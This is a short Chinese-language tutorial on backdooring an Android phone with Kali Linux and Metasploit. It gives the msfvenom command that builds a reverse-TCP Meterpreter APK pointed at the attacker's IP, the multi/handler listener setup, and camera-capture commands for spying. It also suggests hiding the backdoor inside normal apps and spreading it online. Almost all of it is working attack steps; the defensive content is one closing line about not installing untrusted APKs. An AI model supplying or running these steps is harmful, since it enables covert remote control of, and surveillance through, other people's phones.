文本演示怎么使用Kali Linux入侵Android手機。
Kali Linux IP地址:192.168.0.112;接收連接的端口:443。
同一局域網內android手機一部(android 5.1)
創建一個后門程序
在終端中執行:
# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=443 > my_backdoor.apk
這個后門程序(APK)是發送給受害者的;要把上面命令的IP地址替換為攻擊者IP,當后門程序運行時,它會試圖連接這個IP。
啟動Metasploit-等待受害者啟動后門程序
msfconsole
依次執行:
msf > use exploit/multi/handler
> set payload android/meterpreter/reverse_tcp
> set lhost 192.168.0.112
> set lport 443
> exploit
分發后門程序
一般后門程序都打包到正常app中,反正就是各種藏;
借助internet分發后門程序。
閑話不多書,這里我在自己的android手機上安裝運行帶后門的apk。
病毒!!!
控制受害者手機
受害者運行后門程序之后,就可以使用Metasploit控制他了:
使用help查看可以使用的命令:
例如使用對方的攝像頭拍照:
> webcam_list
> webcam_snap
怎么防范:
- 不要安裝不信任的apk
